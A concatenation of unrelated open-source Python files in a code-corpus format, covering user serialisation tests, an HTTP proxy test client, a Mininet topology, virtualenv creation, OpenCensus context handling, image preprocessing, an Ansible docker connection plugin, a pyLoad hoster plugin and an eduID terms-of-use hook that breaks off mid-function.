'value': None})
self.assertIsNotNone(str(bcf))
bcf = BridgeCustomField(field_id="5",
name="REGID",
value="787")
self.assertEqual(bcf.to_json(),
{'custom_field_id': '5',
'value': '787'})
def test_bridge_user(self):
bcf = BridgeCustomField(
field_id="5",
name="REGID",
value="12345678901234567890123456789012")
user = BridgeUser()
user.netid = "iamstudent"
user.full_name = "Iam Student"
user.first_name = "Iam A"
user.last_name = "Student"
user.email = "[email protected]"
user.custom_fields.append(bcf)
user.updated_at = parse_datetime("2016-08-08T13:58:20.635-07:00")
self.assertIsNotNone(str(user))
self.assertFalse(user.has_course_summary())
self.assertFalse(user.no_learning_history())
self.assertEqual(user.get_uid(), "[email protected]")
user = BridgeUser()
user.netid = "iamstudent"
user.full_name = "Iam Student"
user.email = "[email protected]"
user.custom_fields.append(bcf)
user.completed_courses_count = 3
self.assertTrue(user.has_course_summary())
self.assertFalse(user.no_learning_history())
self.assertIsNotNone(str(user))
def test_to_json_patch(self):
user = BridgeUser(netid="iamstudent",
full_name="Iam Student",
first_name="Iam A",
last_name="Student",
email="[email protected]"
)
json_patch = user.to_json_patch()
self.assertEqual(
user.to_json_patch(),
{'user': {
'uid': '[email protected]',
'email': '[email protected]',
'first_name': 'Iam A',
'last_name': 'Student',
'full_name': 'Iam Student'}})
user.bridge_id = 123
self.assertTrue(user.has_bridge_id())
self.assertEqual(
user.to_json_patch(),
{'user': {
'id': 123,
'uid': '[email protected]',
'email': '[email protected]',
'full_name': 'Iam Student',
'first_name': 'Iam A',
'last_name': 'Student'}})
bcf = BridgeCustomField(field_id="5",
name="REGID",
value="12345678901234567890123456789012")
user.custom_fields.append(bcf)
json_patch = user.to_json_patch()
self.assertEqual(
user.to_json_patch(),
{'user': {
'id': 123,
'uid': '[email protected]',
'email': '[email protected]',
'first_name': 'Iam A',
'last_name': 'Student',
'full_name': 'Iam Student',
'custom_fields': [
{'custom_field_id': '5',
'value': '12345678901234567890123456789012'}],
}})
def test_to_json_post(self):
bcf = BridgeCustomField(field_id="5",
name="REGID",
value="12345678901234567890123456789012")
user = BridgeUser(netid="iamstudent",
full_name="Iam Student",
email="[email protected]"
)
user.custom_fields.append(bcf)
json_post = user.to_json_post()
self.assertEqual(
user.to_json_post(),
{'users': [{
'uid': '[email protected]',
'email': '[email protected]',
'full_name': 'Iam Student',
'custom_fields': [
{'custom_field_id': '5',
'value': '12345678901234567890123456789012'}],
}]})
user.bridge_id = 123
self.assertEqual(
user.to_json_post(),
{'users': [{
'id': 123,
'uid': '[email protected]',
'email': '[email protected]',
'full_name': 'Iam Student',
'custom_fields': [
{'custom_field_id': '5',
'value': '12345678901234567890123456789012'}],
}]})
| apache-2.0 | 7,133,562,859,963,257,000 | 37.167785 | 73 | 0.472305 | false |
kenshinx/rps | test/http_client.py | 1 | 4579 | #! /usr/bin/env python
import re
import socket
import optparse
HTTP_PROXY_HOST = "dev1"
HTTP_PROXY_PORT = 8889
HTTP_PROXY_HOST = "localhost"
HTTP_PROXY_PORT = 9891
HTTP_PROXY_UNAME = "rps"
HTTP_PROXY_PASSWD = "secret"
class HTTPTunnelPorxy(object):
pattern = re.compile("^HTTP\/1\.\d ([0-9]{3}) .*")
def __init__(self, proxy_host, proxy_port, proxy_uname, proxy_passwd):
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
self.s.connect((proxy_host, proxy_port))
except:
print "can't connect porxy: %s:%d" %(proxy_host, proxy_port)
exit(1);
self.uname = proxy_uname;
self.passwd = proxy_passwd;
def handshake(self, host, port):
payload = "CONNECT %s:%d HTTP/1.1\r\n" %(host, port)
payload = payload + "HOST: %s\r\n" %host
payload = payload + "User-agent: RPS/HTTP PROXY\r\n"
payload = payload + "\r\n"
print "---------------------------------------------"
print "send:\n"
print payload
self.s.sendall(payload)
data = self.s.recv(1024)
print "recv: %d character\n" %len(data)
print data
data = data.strip()
try:
code = self.pattern.findall(data)[0]
except Exception, e:
print "invalid http response"
return False
if code == "200":
print "handshake success"
return True
elif code == "407":
return self.authenticate(host, port)
else:
print "invalid http response code"
return False
def authenticate(self, host, port):
credential = "%s:%s" %(self.uname, self.passwd)
credential = credential.encode("base64")
credential = "Basic %s" %credential
print credential
payload = "CONNECT %s:%d HTTP/1.1\r\n" %(host, port)
payload = payload + "HOST: %s\r\n" %host
payload = payload + "User-agent: RPS/HTTP PROXY\r\n"
payload = payload + "Proxy-Authorization: %s\r\n" %credential
payload = payload + "\r\n"
print "---------------------------------------------"
print "send:\n"
print payload
self.s.sendall(payload)
data = self.s.recv(1024)
print "recv: %d character\n" %len(data)
print data
data = data.strip()
try:
code = self.pattern.findall(data)[0]
except Exception, e:
print "invalid http response"
return False
if code == "200":
print "http authenticate success"
return True
elif code == "407":
print "http authenticate fail"
return False
else:
print "invalid http response code"
return False
def doHTTPRequest(self, host, port):
if not self.handshake(host, port):
return
payload = "GET / HTTP/1.1\r\n"
payload = payload + "HOST: %s\r\n" %host
payload = payload + "\r\n"
print "---------------------------------------------"
print "send: \n"
print payload
self.s.sendall(payload)
data = self.s.recv(1024)
print "recv: %d character\n" %len(data)
print data
def doHTTPSRequest(self, host, port):
if not self.handshake(host, port):
return
payload = "GET https://%s HTTP/1.1\r\n" %host
payload = payload + "HOST: %s\r\n" %host
payload = payload + "\r\n"
print "---------------------------------------------"
print "send: \n"
print payload
self.s.sendall(payload)
data = self.s.recv(1024)
print "recv: %d character\n" %len(data)
print data
def doWhoisRequest(self, host, port, query):
if not self.handshake(host, port):
return
payload = "%s\r\n" %query
print "---------------------------------------------"
print "send: \n"
print payload
self.s.sendall(payload)
data = self.s.recv(1024)
print "recv: \n"
print data
def main():
proxy = HTTPTunnelPorxy(HTTP_PROXY_HOST, HTTP_PROXY_PORT,
HTTP_PROXY_UNAME, HTTP_PROXY_PASSWD)
proxy.doHTTPRequest("www.google.com", 80)
#proxy.doHTTPSRequest("www.google.com", 80)
#proxy.doWhoisRequest("whois.godaddy.com", 43, "kenshinx.me")
if __name__ == "__main__":
main()
| mit | -7,370,360,084,969,663,000 | 24.581006 | 74 | 0.505569 | false |
calee0219/Course | SDN/Lab1/FatTreeTopoHardCode.py | 1 | 4467 | #!/usr/bin/env python
from mininet.topo import Topo
from mininet import net
from mininet.net import Mininet
POD_NUM = 4
class FatTreeTopoHardCode(Topo):
"""
A Simple FatTree Topo
"""
def __init__(self):
# Initialize topology
Topo.__init__(self)
# Create pod and core
## p0
p0h1 = self.addHost('p0h1')
p0h2 = self.addHost('p0h2')
p0h3 = self.addHost('p0h3')
p0h4 = self.addHost('p0h4')
## Edge Switch
p0e1 = self.addSwitch('p0e1')
p0e2 = self.addSwitch('p0e2')
## Aggregation
p0a1 = self.addSwitch('p0a1')
p0a2 = self.addSwitch('p0a2')
# Add links (100Mbps)
## Agg <-> Edge
self.addLink(p0a1, p0e1, bw=100)
self.addLink(p0a1, p0e2, bw=100)
self.addLink(p0a2, p0e1, bw=100)
self.addLink(p0a2, p0e2, bw=100)
## Edge <-> Host
self.addLink(p0e1, p0h1, bw=100)
self.addLink(p0e1, p0h2, bw=100)
self.addLink(p0e2, p0h3, bw=100)
self.addLink(p0e2, p0h4, bw=100)
## p1
p1h1 = self.addHost('p1h1')
p1h2 = self.addHost('p1h2')
p1h3 = self.addHost('p1h3')
p1h4 = self.addHost('p1h4')
## Edge Switch
p1e1 = self.addSwitch('p1e1')
p1e2 = self.addSwitch('p1e2')
## Aggregation
p1a1 = self.addSwitch('p1a1')
p1a2 = self.addSwitch('p1a2')
# Add links (100Mbps)
## Agg <-> Edge
self.addLink(p1a1, p1e1, bw=100)
self.addLink(p1a1, p1e2, bw=100)
self.addLink(p1a2, p1e1, bw=100)
self.addLink(p1a2, p1e2, bw=100)
## Edge <-> Host
self.addLink(p1e1, p1h1, bw=100)
self.addLink(p1e1, p1h2, bw=100)
self.addLink(p1e2, p1h3, bw=100)
self.addLink(p1e2, p1h4, bw=100)
## p2
p2h1 = self.addHost('p2h1')
p2h2 = self.addHost('p2h2')
p2h3 = self.addHost('p2h3')
p2h4 = self.addHost('p2h4')
## Edge Switch
p2e1 = self.addSwitch('p2e1')
p2e2 = self.addSwitch('p2e2')
## Aggregation
p2a1 = self.addSwitch('p2a1')
p2a2 = self.addSwitch('p2a2')
# Add links (100Mbps)
## Agg <-> Edge
self.addLink(p2a1, p2e1, bw=100)
self.addLink(p2a1, p2e2, bw=100)
self.addLink(p2a2, p2e1, bw=100)
self.addLink(p2a2, p2e2, bw=100)
## Edge <-> Host
self.addLink(p2e1, p2h1, bw=100)
self.addLink(p2e1, p2h2, bw=100)
self.addLink(p2e2, p2h3, bw=100)
self.addLink(p2e2, p2h4, bw=100)
## p3
p3h1 = self.addHost('p3h1')
p3h2 = self.addHost('p3h2')
p3h3 = self.addHost('p3h3')
p3h4 = self.addHost('p3h4')
## Edge Switch
p3e1 = self.addSwitch('p3e1')
p3e2 = self.addSwitch('p3e2')
## Aggregation
p3a1 = self.addSwitch('p3a1')
p3a2 = self.addSwitch('p3a2')
# Add links (100Mbps)
## Agg <-> Edge
self.addLink(p3a1, p3e1, bw=100)
self.addLink(p3a1, p3e2, bw=100)
self.addLink(p3a2, p3e1, bw=100)
self.addLink(p3a2, p3e2, bw=100)
## Edge <-> Host
self.addLink(p3e1, p3h1, bw=100)
self.addLink(p3e1, p3h2, bw=100)
self.addLink(p3e2, p3h3, bw=100)
self.addLink(p3e2, p3h4, bw=100)
# Add core switch
p0c = self.addSwitch('p0c')
p1c = self.addSwitch('p1c')
p2c = self.addSwitch('p2c')
p3c = self.addSwitch('p3c')
# Link Core to pod
## p0c
self.addLink(p0c, p0a1, bw=1000, loss=2)
self.addLink(p0c, p1a1, bw=1000, loss=2)
self.addLink(p0c, p2a1, bw=1000, loss=2)
self.addLink(p0c, p3a1, bw=1000, loss=2)
## p1c
self.addLink(p1c, p0a1, bw=1000, loss=2)
self.addLink(p1c, p1a1, bw=1000, loss=2)
self.addLink(p1c, p2a1, bw=1000, loss=2)
self.addLink(p1c, p3a1, bw=1000, loss=2)
## p2c
self.addLink(p2c, p0a2, bw=1000, loss=2)
self.addLink(p2c, p1a2, bw=1000, loss=2)
self.addLink(p2c, p2a2, bw=1000, loss=2)
self.addLink(p2c, p3a2, bw=1000, loss=2)
## p3c
self.addLink(p3c, p0a2, bw=1000, loss=2)
self.addLink(p3c, p1a2, bw=1000, loss=2)
self.addLink(p3c, p2a2, bw=1000, loss=2)
self.addLink(p3c, p3a2, bw=1000, loss=2)
topos = {'fattree': (lambda: FatTreeTopoHardCode())}
| mit | -4,874,537,547,002,850,000 | 30.457746 | 52 | 0.544437 | false |
living180/vex | vex/make.py | 1 | 2367 | import os
import sys
import distutils.spawn
from vex.run import run
from vex import exceptions
PYDOC_SCRIPT = """#!/usr/bin/env python
from pydoc import cli
cli()
""".encode('ascii')
PYDOC_BATCH = """
@python -m pydoc %*
""".encode('ascii')
def handle_make(environ, options, make_path):
if os.path.exists(make_path):
# Can't ignore existing virtualenv happily because existing one
# might have different parameters and --make implies nonexistent
raise exceptions.VirtualenvAlreadyMade(
"virtualenv already exists: {0!r}".format(make_path)
)
ve_base = os.path.dirname(make_path)
if not os.path.exists(ve_base):
os.mkdir(ve_base)
elif not os.path.isdir(ve_base):
raise exceptions.VirtualenvNotMade(
"could not make virtualenv: "
"{0!r} already exists but is not a directory. "
"Choose a different virtualenvs path using ~/.vexrc "
"or $WORKON_HOME, or remove the existing file; "
"then rerun your vex --make command.".format(ve_base)
)
# TODO: virtualenv is usually not on PATH for Windows,
# but finding it is a terrible issue.
if os.name == 'nt' and not os.environ.get('VIRTUAL_ENV', ''):
ve = os.path.join(
os.path.dirname(sys.executable),
'Scripts',
'virtualenv'
)
else:
ve = 'virtualenv'
args = [ve, make_path]
if options.python:
if os.name == 'nt':
python = distutils.spawn.find_executable(options.python)
if python:
options.python = python
args += ['--python', options.python]
if options.site_packages:
args += ['--system-site-packages']
if options.always_copy:
args+= ['--always-copy']
returncode = run(args, env=environ, cwd=ve_base)
if returncode != 0:
raise exceptions.VirtualenvNotMade("error creating virtualenv")
if os.name != 'nt':
pydoc_path = os.path.join(make_path, 'bin', 'pydoc')
with open(pydoc_path, 'wb') as out:
out.write(PYDOC_SCRIPT)
perms = os.stat(pydoc_path).st_mode
os.chmod(pydoc_path, perms | 0o0111)
else:
pydoc_path = os.path.join(make_path, 'Scripts', 'pydoc.bat')
with open(pydoc_path, 'wb') as out:
out.write(PYDOC_BATCH)
| mit | -1,349,267,931,707,901,400 | 32.814286 | 72 | 0.600338 | false |
census-instrumentation/opencensus-python | context/opencensus-context/opencensus/common/runtime_context/__init__.py | 1 | 5207 | # Copyright 2019, OpenCensus Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
try:
import contextvars
except ImportError:
contextvars = None
import threading
__all__ = ['RuntimeContext']
class _RuntimeContext(object):
@classmethod
def clear(cls):
"""Clear all slots to their default value."""
raise NotImplementedError # pragma: NO COVER
@classmethod
def register_slot(cls, name, default=None):
"""Register a context slot with an optional default value.
:type name: str
:param name: The name of the context slot.
:type default: object
:param name: The default value of the slot, can be a value or lambda.
:returns: The registered slot.
"""
raise NotImplementedError # pragma: NO COVER
def apply(self, snapshot):
"""Set the current context from a given snapshot dictionary"""
for name in snapshot:
setattr(self, name, snapshot[name])
def snapshot(self):
"""Return a dictionary of current slots by reference."""
return dict((n, self._slots[n].get()) for n in self._slots.keys())
def __repr__(self):
return ('{}({})'.format(type(self).__name__, self.snapshot()))
def __getattr__(self, name):
if name not in self._slots:
raise AttributeError('{} is not a registered context slot'
.format(name))
slot = self._slots[name]
return slot.get()
def __setattr__(self, name, value):
if name not in self._slots:
raise AttributeError('{} is not a registered context slot'
.format(name))
slot = self._slots[name]
slot.set(value)
def with_current_context(self, func):
"""Capture the current context and apply it to the provided func"""
caller_context = self.snapshot()
def call_with_current_context(*args, **kwargs):
try:
backup_context = self.snapshot()
self.apply(caller_context)
return func(*args, **kwargs)
finally:
self.apply(backup_context)
return call_with_current_context
class _ThreadLocalRuntimeContext(_RuntimeContext):
_lock = threading.Lock()
_slots = {}
class Slot(object):
_thread_local = threading.local()
def __init__(self, name, default):
self.name = name
self.default = default if callable(default) else (lambda: default)
def clear(self):
setattr(self._thread_local, self.name, self.default())
def get(self):
try:
return getattr(self._thread_local, self.name)
except AttributeError:
value = self.default()
self.set(value)
return value
def set(self, value):
setattr(self._thread_local, self.name, value)
@classmethod
def clear(cls):
with cls._lock:
for name in cls._slots:
slot = cls._slots[name]
slot.clear()
@classmethod
def register_slot(cls, name, default=None):
with cls._lock:
if name in cls._slots:
raise ValueError('slot {} already registered'.format(name))
slot = cls.Slot(name, default)
cls._slots[name] = slot
return slot
class _AsyncRuntimeContext(_RuntimeContext):
_lock = threading.Lock()
_slots = {}
class Slot(object):
def __init__(self, name, default):
self.name = name
self.contextvar = contextvars.ContextVar(name)
self.default = default if callable(default) else (lambda: default)
def clear(self):
self.contextvar.set(self.default())
def get(self):
try:
return self.contextvar.get()
except LookupError:
value = self.default()
self.set(value)
return value
def set(self, value):
self.contextvar.set(value)
@classmethod
def clear(cls):
with cls._lock:
for name in cls._slots:
slot = cls._slots[name]
slot.clear()
@classmethod
def register_slot(cls, name, default=None):
with cls._lock:
if name in cls._slots:
raise ValueError('slot {} already registered'.format(name))
slot = cls.Slot(name, default)
cls._slots[name] = slot
return slot
RuntimeContext = _ThreadLocalRuntimeContext()
if contextvars:
RuntimeContext = _AsyncRuntimeContext()
| apache-2.0 | 6,168,054,212,656,618,000 | 28.418079 | 78 | 0.580757 | false |
google-research/tensor2robot | preprocessors/distortion.py | 1 | 4670 | # coding=utf-8
# Copyright 2021 The Tensor2Robot Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Shared utils for image distorton and cropping."""
from tensor2robot.preprocessors import image_transformations
import tensorflow.compat.v1 as tf
def maybe_distort_image_batch(images, mode):
"""Applies data augmentation to given images.
Args:
images: 4D Tensor (batch images) or 5D Tensor (batch of image sequences).
mode: (ModeKeys) Specifies if this is training, evaluation or prediction.
Returns:
Distorted images. Image distortion is identical for every image in the
batch.
"""
if mode == tf.estimator.ModeKeys.TRAIN:
images = image_transformations.ApplyPhotometricImageDistortions([images])[0]
return images
def preprocess_image(image,
mode,
is_sequence,
input_size,
target_size,
crop_size=None,
image_distortion_fn=maybe_distort_image_batch):
"""Shared preprocessing function for images.
Args:
image: A tf.Tensor for the input images, which is either a 4D Tensor (batch
of images) or 5D Tensor (batch of sequences). It is assumed that all
dimensions are constant, except the batch dimension.
mode: (modekeys) specifies if this is training, evaluation or prediction.
is_sequence: Should be True if input is a batch of sequences, and False
otherwise.
input_size: [h, w] of the input image
target_size: [h, w] of the output image, expected to be equal or smaller
than input size. If smaller, we do a crop of the image.
crop_size: [h, w] of crop size. If None, defaults to target_size.
image_distortion_fn: A function that takes an image tensor and the training
mode as input and returns an image tensor of the same size as the input.
Returns:
A tf.Tensor for the batch of images / batch of sequences. If mode == TRAIN,
this applies image distortion and crops the image randomly. Otherwise, it
does not add image distortion and takes a crop from the center of the image.
"""
leading_shape = tf.shape(image)[:-3]
# Must be tf.float32 to distort.
image = tf.image.convert_image_dtype(image, tf.float32)
if is_sequence:
# Flatten batch dimension.
image = tf.reshape(image, [-1] + image.shape[-3:].as_list())
crop_size = crop_size or target_size
image = crop_image(
image, mode, input_size=input_size, target_size=crop_size)
# Reshape to target size.
image = tf.image.resize_images(image, target_size)
# Convert dtype and distort.
image = image_distortion_fn(image, mode=mode)
# Flatten back into a sequence.
if is_sequence:
tail_shape = tf.constant(list(target_size) + [3])
full_final_shape = tf.concat([leading_shape, tail_shape], axis=0)
image = tf.reshape(image, full_final_shape)
return image
def crop_image(img, mode, input_size=(512, 640), target_size=(472, 472)):
"""Takes a crop of the image, either randomly or from the center.
The crop is consistent across all images given in the batch.
Args:
img: 4D image Tensor [batch, height, width, channels].
mode: (ModeKeys) Specifies if this is training, evaluation or prediction.
input_size: (height, width) of input.
target_size: (height, width) of desired crop.
Returns:
img cropped to the desired size, randomly if mode == TRAIN and from the
center otherwise.
"""
if input_size == target_size:
# Don't even bother adding the ops.
return img
input_height, input_width = input_size
input_shape = (input_height, input_width, 3)
target_shape = target_size
if mode == tf.estimator.ModeKeys.TRAIN:
crops = image_transformations.RandomCropImages([img],
input_shape=input_shape,
target_shape=target_shape)[0]
else:
crops = image_transformations.CenterCropImages([img],
input_shape=input_shape,
target_shape=target_shape)[0]
return crops
| apache-2.0 | 1,685,826,182,705,913,300 | 36.96748 | 80 | 0.66788 | false |
huangminghuang/ansible-docker-connection | connection_plugins/docker.py | 1 | 3787 | # Connection plugin for configuring docker containers
# Author: Lorin Hochstein
#
# Based on the chroot connection plugin by Maykel Moya
import os
import subprocess
import time
from ansible import errors
from ansible.callbacks import vvv
class Connection(object):
def __init__(self, runner, host, port, *args, **kwargs):
self.host = host
self.runner = runner
self.has_pipelining = False
self.docker_cmd = "docker"
def connect(self, port=None):
""" Connect to the container. Nothing to do """
return self
def exec_command(self, cmd, tmp_path, sudo_user=None, sudoable=False,
executable='/bin/sh', in_data=None, become=None,
become_user=None):
""" Run a command on the local host """
# Don't currently support su
# if su or su_user:
# raise errors.AnsibleError("Internal Error: this module does not "
# "support running commands via su")
if in_data:
raise errors.AnsibleError("Internal Error: this module does not "
"support optimized module pipelining")
# if sudoable and sudo_user:
# raise errors.AnsibleError("Internal Error: this module does not "
# "support running commands via sudo")
if executable:
local_cmd = [self.docker_cmd, "exec", self.host, executable,
'-c', cmd]
else:
local_cmd = '%s exec "%s" %s' % (self.docker_cmd, self.host, cmd)
vvv("EXEC %s" % (local_cmd), host=self.host)
p = subprocess.Popen(local_cmd,
shell=isinstance(local_cmd, basestring),
cwd=self.runner.basedir,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
return (p.returncode, '', stdout, stderr)
# Docker doesn't have native support for copying files into running
# containers, so we use docker exec to implement this
def put_file(self, in_path, out_path):
""" Transfer a file from local to container """
args = [self.docker_cmd, "exec", "-i", self.host, "bash", "-c",
"cat > %s" % format(out_path)]
vvv("PUT %s TO %s" % (in_path, out_path), host=self.host)
if not os.path.exists(in_path):
raise errors.AnsibleFileNotFound(
"file or module does not exist: %s" % in_path)
p = subprocess.Popen(args, stdin=open(in_path),
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p.communicate()
# HACK: Due to a race condition, this sometimes returns before
# the file has been written to disk, so we sleep for one second
time.sleep(1)
def fetch_file(self, in_path, out_path):
""" Fetch a file from container to local. """
# out_path is the final file path, but docker takes a directory, not a
# file path
out_dir = os.path.dirname(out_path)
args = [self.docker_cmd, "cp", "%s:%s" % (self.host, in_path), out_dir]
vvv("FETCH %s TO %s" % (in_path, out_path), host=self.host)
p = subprocess.Popen(args, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p.communicate()
# Rename if needed
actual_out_path = os.path.join(out_dir, os.path.basename(in_path))
if actual_out_path != out_path:
os.rename(actual_out_path, out_path)
def close(self):
""" Terminate the connection. Nothing to do for Docker"""
pass
| gpl-3.0 | 7,907,822,090,526,358,000 | 37.642857 | 79 | 0.567468 | false |
JeroenBosmans/nabu | nabu/processing/text_reader.py | 1 | 3606 | '''@file textreader.py
contains the Textreader class'''
import os
import numpy as np
class TextReader(object):
'''reads text from disk'''
def __init__(self, textfile, max_length, coder, base_pos=0,
end_pos=None):
'''TextReader constructor
Args:
textfile: the path to the file containing the text
max_length: the maximal length of a line
coder: a TargetCoder object
base_pos: the base postion where to start reading in the file
end_pos: optional maximal position in the file'''
self.max_length = max_length
self.coder = coder
#initialise the position to the beginning of the file
self.base_pos = base_pos
self.pos = base_pos
self.end_pos = end_pos or os.path.getsize(textfile)
if base_pos >= self.end_pos:
raise Exception('base position should come before end position')
#store the scp path
self.textfile = textfile
def get_utt(self):
'''read the next line of data specified in the scp file
Args:
pos: the desired position in the scp file in bytes
Returns:
- the line identifier
- the read line as a [length x 1] numpy array
- whether or not the read utterance is the last one
'''
#read a line
line_id, line, looped = self.read_line()
#encode the line
encoded = self.coder.encode(line)[:, np.newaxis]
return line_id, encoded, looped
def read_line(self):
'''read the next line of data specified in the scp file
Args:
pos: the desired position in the scp file in bytes
Returns:
- the line identifier
- the read line as a string
- whether or not the read utterance is the last one
'''
#create the utteance id
line_id = 'line%d' % self.pos
#read a line in the scp file
with open(self.textfile) as fid:
fid.seek(self.pos)
line = fid.readline().strip()
self.pos = fid.tell()
#if end of file is reached loop around
if self.pos >= self.end_pos:
looped = True
self.pos = self.base_pos
else:
looped = False
return line_id, line, looped
def split(self, numlines):
'''split of a part of the textreader
Args:
numlines: number of lines tha should be in the new textreader
Returns:
a Textreader object that contains the required number of lines
'''
#read the requested number of lines
self.pos = self.base_pos
for _ in range(numlines):
_, _, looped = self.get_utt()
if looped:
raise Exception('number of requested lines exeeds the content')
#create a new textreader with the appropriate boundaries
textreader = TextReader(self.textfile, self.max_length, self.base_pos,
self.pos)
#update the base position
self.base_pos = self.pos
return textreader
def as_dict(self):
'''return the reader as a dictionary'''
#save the position
pos = self.pos
#start at the beginning
self.pos = self.base_pos
asdict = dict()
looped = False
while not looped:
line_id, line, looped = self.read_line()
asdict[line_id] = line
#set the position back to the original
self.pos = pos
| mit | -8,119,472,119,550,117,000 | 27.619048 | 79 | 0.567388 | false |
zenieldanaku/pygpj | main.py | 1 | 1847 | import func.core.config as c
import func.core.intro as intro
from func.core.lang import t
from func.core.viz import subselector
from func.core.prsnj import Pj
from func.core.export import imprimir_clases
import os
def cargar_archivo(prompt, carpeta):
from func.data.setup import data as s
ars, nom = [], []
for ar in os.listdir(carpeta):
if os.path.isfile(carpeta+'/'+ar):
personaje = c.abrir_json(carpeta+'/'+ar)
nom.append(personaje['nombre']+' ('+imprimir_clases(personaje['cla'],s.CLASES)+')')
ars.append(ar)
sel = subselector(prompt,nom,True)
data = c.abrir_json(carpeta+'/'+ars[sel])
return data
def menu ():
while True:
opciones = [t('Crear un nuevo personaje'),
t('Avanzar un personaje existente'),
t('Editar preferencias'),
t('Salir'),
'\n'+t('Ver licencia')]
intro.imprimir_titulo()
intro.introduccion()
print(t('Elije una opción'))
op = subselector(t('Opción'),opciones)
if op == 0: # Crear un nuevo Pj
import func.core.chargen
Pj.nuevo_pj()
func.core.chargen.go()
elif op == 1: # Avanzar un Pj existente
import func.core.chargen
Pj.cargar_pj(cargar_archivo('Personaje','Guardar'))
func.core.chargen.go()
elif op == 2: # preferencias
c.preferencias(c.abrir_json('config.json'))
elif op == 3: # exit
break
elif op == 4:
intro.licencia('LICENSE.txt')
input(t('\n[Presione Enter para continuar]\n'))
if __name__ == '__main__':
os.system(['clear','cls'][os.name == 'nt'])
menu()
| mit | -6,750,891,117,660,819,000 | 32.166667 | 95 | 0.532249 | false |
fzimmermann89/pyload | module/plugins/hoster/LoadTo.py | 1 | 2129 | # -*- coding: utf-8 -*-
#
# Test links:
# http://www.load.to/JWydcofUY6/random.bin
# http://www.load.to/oeSmrfkXE/random100.bin
import re
from module.plugins.captcha.SolveMedia import SolveMedia
from module.plugins.internal.SimpleHoster import SimpleHoster, create_getInfo
class LoadTo(SimpleHoster):
__name__ = "LoadTo"
__type__ = "hoster"
__version__ = "0.26"
__status__ = "testing"
__pattern__ = r'http://(?:www\.)?load\.to/\w+'
__config__ = [("activated" , "bool", "Activated" , True),
("use_premium", "bool", "Use premium account if available", True)]
__description__ = """Load.to hoster plugin"""
__license__ = "GPLv3"
__authors__ = [("halfman", "[email protected]"),
("stickell", "[email protected]")]
NAME_PATTERN = r'<h1>(?P<N>.+?)</h1>'
SIZE_PATTERN = r'Size: (?P<S>[\d.,]+) (?P<U>[\w^_]+)'
OFFLINE_PATTERN = r'>Can\'t find file'
LINK_FREE_PATTERN = r'<form method="post" action="(.+?)"'
WAIT_PATTERN = r'type="submit" value="Download \((\d+)\)"'
URL_REPLACEMENTS = [(r'(\w)$', r'\1/')]
def setup(self):
self.multiDL = True
self.chunk_limit = 1
def handle_free(self, pyfile):
#: Search for Download URL
m = re.search(self.LINK_FREE_PATTERN, self.html)
if m is None:
self.error(_("LINK_FREE_PATTERN not found"))
self.link = m.group(1)
#: Set Timer - may be obsolete
m = re.search(self.WAIT_PATTERN, self.html)
if m is not None:
self.wait(m.group(1))
#: Load.to is using solvemedia captchas since ~july 2014:
solvemedia = SolveMedia(self)
captcha_key = solvemedia.detect_key()
if captcha_key:
response, challenge = solvemedia.challenge(captcha_key)
self.download(self.link,
post={'adcopy_challenge': challenge,
'adcopy_response' : response,
'returnUrl' : pyfile.url})
getInfo = create_getInfo(LoadTo)
| gpl-3.0 | 2,512,844,144,708,544,500 | 29.855072 | 85 | 0.542508 | false |
SUNET/eduid-webapp | src/eduid_webapp/idp/tou_action.py | 1 | 2992 | #
# Copyright (c) 2015 NORDUnet A/S
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or
# without modification, are permitted provided that the following
# conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# 3. Neither the name of the NORDUnet nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
__author__ = 'eperez'
from typing import Optional
from eduid_common.session.logindata import SSOLoginData
from eduid_userdb.actions import Action
from eduid_userdb.idp import IdPUser
from eduid_webapp.idp.app import current_idp_app as current_app
def add_actions(user: IdPUser, ticket: SSOLoginData) -> Optional[Action]:
"""
Add an action requiring the user to accept a new version of the Terms of Use,
in case the IdP configuration points to a version the user hasn't accepted.
This function is called by the IdP when it iterates over all the registered
action plugins entry points.
:param user: the authenticating user
:param ticket: the SSO login data
"""
version = current_app.conf.tou_version
interval = current_app.conf.tou_reaccept_interval
if user.tou.has_accepted(version, interval):
